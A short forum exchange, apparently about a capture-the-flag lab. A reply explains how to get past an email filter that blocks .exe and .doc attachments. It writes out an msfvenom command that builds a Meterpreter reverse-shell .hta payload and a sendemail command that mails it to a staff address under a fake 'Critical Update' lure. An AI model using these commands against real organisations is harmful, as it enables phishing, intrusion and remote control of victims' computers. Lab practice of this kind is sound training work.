Got stuck at Task 2, i am not able to send any attachment with a suitable extension (.exe, .doc, etc) to the discovered email (i got an 554 error with sendemail). Any hints, please? Thank you!
It does not work because .exe and .doc payloads are automatically blocked.
You need to create a .hta payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f hta-psh -o shell.hta
Next you can send the email with the malicious attachment via sendmail:
sendemail -f attacker@evil.com -t techsupport@staff.fincorp.com -u “Critical Update” -m “Please review and install the attached urgent update.” -a shell.hta -s mail.server.local:25
If you can find flags 3 and 4 let me know something I never managed to finish it! D:
Thanks a lot!! I let you know if I go ahead with the next points.